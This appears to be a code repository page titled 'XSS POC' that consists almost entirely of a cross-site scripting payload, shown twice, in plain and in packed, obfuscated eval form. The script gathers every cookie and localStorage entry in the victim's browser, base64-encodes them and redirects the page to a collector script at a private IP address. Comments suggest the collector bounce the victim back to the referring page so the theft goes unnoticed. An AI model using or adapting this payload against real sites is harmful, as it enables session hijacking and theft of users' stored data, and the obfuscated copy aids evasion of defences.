nicovillanueva/XSS POC

## XSS POC
// The collector must decode the base64-encoded parameter 'payload'
// Suggestion: The PHP script could redirect back to the user's referer, such as:
// header("Location: " . $_SERVER['HTTP_REFERER']);

collector="http://192.168.40.6/cookietrap/trap.php?payload=";
c=function(){ret=""; for(var i = 0; i < document.cookie.split(";").length; i++){ ret+=("- " + document.cookie.split(";")[i] + "\n");} return ret; }();
ls=function(){locStor = ""; for(var i = 0; i < localStorage.length; i++){ locStor += ("Key: " + localStorage.key(i) + "\nValue: " + localStorage.getItem(localStorage.key(i)) + "\n\n");} return locStor; }();
payload="Cookies: \n"+ c + "\nLocalStorage: \n" + ls;
enc=btoa(payload);
alert("Yar cookies are: \n" + c);
alert("And your LocalStorage: \n" + ls );
alert("And now I have them.");
document.location= collector + enc;

// OFUSCATED
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h="E://J.H.m.6/x/t.u?3=";c=e(){5="";j(d i=0;i<8.f.g(";").9;i++){5+=("- "+8.f.g(";")[i]+"\\n")}a 5}();2=e(){7="";j(d i=0;i<1.9;i++){7+=("w: "+1.k(i)+"\\y: "+1.F(1.k(i))+"\\n\\n")}a 7}();3="z: \\n"+c+"\\A: \\n"+2;b=B(3);4("p C D: \\n"+c);4("l q o: \\n"+2);4("l v I s r.");8.G=h+b;',46,46,'|localStorage|ls|payload|alert|ret||locStor|document|length|return|enc||var|function|cookie|split|collector||for|key|And|40||LocalStorage|Yar|your|them|have|trap|php|now|Key|cookietrap|nValue|Cookies|nLocalStorage|btoa|cookies|are|http|getItem|location|168||192'.split('|'),0,{}))
	// The collector must decode the base64-encoded parameter 'payload'
	// Suggestion: The PHP script could redirect back to the user's referer, such as:
	// header("Location: " . $_SERVER['HTTP_REFERER']);

	collector="http://192.168.40.6/cookietrap/trap.php?payload=";
	c=function(){ret=""; for(var i = 0; i < document.cookie.split(";").length; i++){ ret+=("- " + document.cookie.split(";")[i] + "\n");} return ret; }();
	ls=function(){locStor = ""; for(var i = 0; i < localStorage.length; i++){ locStor += ("Key: " + localStorage.key(i) + "\nValue: " + localStorage.getItem(localStorage.key(i)) + "\n\n");} return locStor; }();
	payload="Cookies: \n"+ c + "\nLocalStorage: \n" + ls;
	enc=btoa(payload);
	alert("Yar cookies are: \n" + c);
	alert("And your LocalStorage: \n" + ls );
	alert("And now I have them.");
	document.location= collector + enc;

	// OFUSCATED
	eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]\|\|e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h="E://J.H.m.6/x/t.u?3=";c=e(){5="";j(d i=0;i<8.f.g(";").9;i++){5+=("- "+8.f.g(";")[i]+"\\n")}a 5}();2=e(){7="";j(d i=0;i<1.9;i++){7+=("w: "+1.k(i)+"\\y: "+1.F(1.k(i))+"\\n\\n")}a 7}();3="z: \\n"+c+"\\A: \\n"+2;b=B(3);4("p C D: \\n"+c);4("l q o: \\n"+2);4("l v I s r.");8.G=h+b;',46,46,'\|localStorage\|ls\|payload\|alert\|ret\|\|locStor\|document\|length\|return\|enc\|\|var\|function\|cookie\|split\|collector\|\|for\|key\|And\|40\|\|LocalStorage\|Yar\|your\|them\|have\|trap\|php\|now\|Key\|cookietrap\|nValue\|Cookies\|nLocalStorage\|btoa\|cookies\|are\|http\|getItem\|location\|168\|\|192'.split('\|'),0,{}))